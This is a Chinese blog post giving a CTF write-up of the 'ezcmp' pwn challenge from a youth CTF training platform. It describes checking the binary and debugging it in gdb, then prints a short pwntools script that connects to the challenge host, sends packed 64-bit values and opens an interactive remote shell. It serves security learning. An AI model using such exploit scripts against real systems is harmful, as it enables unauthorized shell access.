ezcmp-青少年ctf平台

最新推荐文章于 2024-05-24 18:10:11 发布
最新推荐文章于 2024-05-24 18:10:11 发布
阅读量217 收藏
点赞数
分类专栏: pwn 文章标签: linux 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57235775/article/details/131530995
版权

题目

 拿到附件后,先在本地测试:

64位程序,没有开启CANARY,可能是栈溢出漏洞,放入IDA查看伪代码:

 简单理解就是如果buf = buff 也就是加密后的字符串,则直接getshell。

打开gdb调试之前,先看一下buff的地址:

记录一下:0x404100 ,接着打开gdb调试:

找到加密的字符地址。

exp:

from pwn import *

context.log_level = 'debug'

#r = process('./pwn')
r = remote("challenge.qsnctf.com",10022)


r.recvuntil("GDB-pwndbg maybe useful")

ret = 0x401354
payload = p64(0x144678aadc0e4072) + p64(0x84b6e81a4c7eb0e2) + p64(0xf426588abcee2052) + p64(0x0000c8cb2c5e90c2)

r.sendline(payload)

r.interactive()

总结:还有许多gdb基本调试命令需要熟悉。大佬调试命令总结

余切66
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 基金会 根盒子 设置 npm install -g juice-shop-ctf-cli 用法 互动模式 打开命令行并运行: juice-shop-ctf 然后按照交互式命令行工具的说明进行操作。 ...
【教程】青少年CTF机器人使用教程
zxsctf的博客
03-24 570
文件操作是真正发挥这个机器人的用途的地方,我们目前融合了GItHub上的部分工具,也有通过自己的方法去写的工具,CTF中涉及文件的题目其实还是非常多的。新版本中,沿用了老版本的编解码功能,只对编解码的代码逻辑进行整理,当然后续版本也会持续增加新的编解码功能。新版本中,沿用了老版本的加解密功能,只对加解密的代码逻辑进行整理,当然后续版本也会持续增加新的加解密功能。当然,这些青币扣除都是非常少的。由于之前版本的机器人重构,所以我们细化了本次的机器人逻辑,并且对机器人的功能进行了一些升级。
青少年CTF-SSTI
weixin_49803180的博客
04-04 1218
在获取初始化属性后,带wrapper的说明没有重载,寻找不带warpper的,因为wrapper是指这些函数并没有被重载,这时它们并不是function,不具有__globals__属性。python的object类中集成了很多的基础函数,我们想要调用的时候也是需要用object去操作的,主要是通过__mro__ 和 __bases__两种方式来创建。|attr()为jinja2原生函数,是一个过滤器,它只查找属性获取并返回对象的属性的值,过滤器与变量用管道符号( | )分割.%}1{% endif %}
青少年 CTF 练习平台:Misc(一)
最新发布
Flag少侠的博客
05-24 6727
Bear(熊日解码)、表情包、神奇的压缩包、Whale、小光的答案之书、是我的 Hanser!、上号、多情、我们的秘密、仓鼠的窝
CTF特训(二):2024青少年CTF-MISC部分WP
LCW991207的博客
02-02 1638
跟着提示来,江苏省无锡市滨湖区的身份证前6位是320211,因此32021119980405?在最下方访问8000端口的网页的时候,请求了shanghao.zip文件 ,把文件导出,点击save。stegslove打开,在文件末尾发现qsnctf,再使用steghide(隐写术软件)工具,进行解密。下载附件,发现是一个流量包,Wireshark打开文件-导出对象-http对象。附件是一个压缩包和一个文本,压缩包需要密码,那么就从文本里下手解密。这是一个神奇的压缩包,任何密码都是错误的!
青少年ctf CheckMe01~08
qq_44640313的博客
01-09 1084
qsnctf CheckMe01~08的wp
青少年CTF-Misc-1
weixin_53226786的博客
07-02 924
然后把能尝试的操作都操作了一编,然后思考很久想起来了,jpg图片文件可以通过steghide工具,然后这下面又多了一串,尝试用steghide进行解密得到flag。用010editor发现文件尾越看越奇怪,然后看上面grep过滤出来的数据,难不成是原本是flag.zip被倒叙了变成了piz.flag,010查看,发现有伪加密,而且还多了个文件头,直接把上面文件头删除,就可解压。tysec{mealibertasmeuscanor}得到一堆2d2d的数据,根据提示,猜测是摩斯和培根密码,尝试解密。
2022工业互联网大赛-杭州-CTF题目
09-14
第一次参加工控类的CTF,然后正好团队中有一个小伙伴电脑连不上局域网,只能从我电脑中下载下来,因此这次正好有完整的题目和附件,然后也基本是misc和crypto题。分享给需要的朋友,如果有人能写出writeup的话,那就...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
青少年CTF】Crypto-easy 题解小集合
zxsctf的博客
01-07 1976
根据提示我们知道是键盘密码,于是联想到手机26键盘和九宫格举个例子,比如附件给出的 ooo yyy ii先看26键,字母o在键盘上所对应的数字是9,在看到九宫格9所对应的有wxyz四个字母,然而字母o出现了三次依次数下去,第一个字母是y原理相同字母y在26键上对应6,九宫格有mno,出现三次第二个字母就是oi对应8,8下面有tuv,出现两次第三个字母就是u,以此类推…然后这就很明显了,接着用核心价值观解密又根据提示得知是栅栏密码解密,栅栏数为6得到最终flag(有些网站解不出来最好多解几次)
青少年CTF-Check_in_easy
giaogiaohuohua的博客
11-05 177
substr的第一个属性为string,$class->$c()是调用了类中的方法,那么在利用PHP内置类时,必须让其内置方法的返回值为string类型。针对于这一题可以使用的内置类其实很多,只要使用的内置类的内置方法返回为string类型,基本上都可以利用,这里我使用的是SplFileInfo内置类。看到代码基本上可以知道,此题需要使用PHP内置类的知识,substr传入的参数是可控的,最终利用substr函数构造可利用参数进行命令执行。二、substr函数。三、pyload构造。
青少年CTF-取证合集
weixin_53226786的博客
05-21 799
我一直以为是flag{IP}搞半天一直是错误,后面有重新看了一下题目才知道,133.1.16.173 这个就是lag。简单看了一下都是sql语句,而且都有flag这个关键字,那我们就把所有关键字flag导出来。搜了一下flag,那就直接进wires hark打开压缩包搜。描述说了,有恶意用户下载了程序,那直接导出所有数据找一下。找了半天,不知道咋整了,想起个手法,找到一句话马子。找到了,红框标出来的文件,打开文件得到flag。一开机谈了个程序出来,要我们输入用户名。给了一个提示,那得玩点骚的操作了。
青少年CTF擂台挑战赛2024round#1 web与杂项部分题解
2301_76968724的博客
03-02 1877
这次的青少年CTF擂台挑战赛,相较于去年,我觉得,今年的web题很适合刚入门的初学者进行攻克,难度属于中等对于初学者来讲,还是需要了解一些web方面稍微深层的知识,并且做题还是需要一些脑洞。话不多说咱们开始。
青少年CTF】“Flag在哪里?”解题记录
qq_64868579的博客
06-04 1365
例如“Flag在哪里?青少年CTF训练平台:www.qsnctf.com。复制以后选择其中qsnctf{}部分提交即可。第一反应就是查看网页源代码寻找flag。描述中并没有给出什么有用的信息。博主用户名:Fourstar.一般来讲有关于直接问Flag的。开启Game-Box题目环境。但是右键或者选中都没有用。所以直接F12进入检查。
青少年ctf-random(梅森算法-MT19973)
yuqie的博客
06-14 482
这道题的漏洞在于这个函数: MT19973算法能生成1-623个32位随机数,而我们有 (32/32+64/32+96/32)*104=624个已知随机数,那么我们就完全可以求出下一个随机数。这里生成的一组数据里分别是32位、64位、96位,这里我们只需要32位,所以需要把64位和96位的数分成两个或者三个32位数,可以用它们与32位全为1的二进制数来分离。这里可以直接引用RandCrack库,将已经生成的624个数按顺序传入RandCrack函数里,利用predict_getrandbits来计算出下
青少年CTF训练平台Easy_Web
Fenghe2的博客
04-17 440
青少年CTF训练平台Easy_Web
青少年ctf训练平台misc
05-26
推荐一个青少年CTF训练平台misc,可以尝试一下picoCTF,它是由卡内基梅隆大学开发的一个免费的CTF平台,主要面向初学者和青少年。picoCTF包含多个类别的题目,其中misc类别包括密码学、逆向工程、网络安全、二进制等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

余切66

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值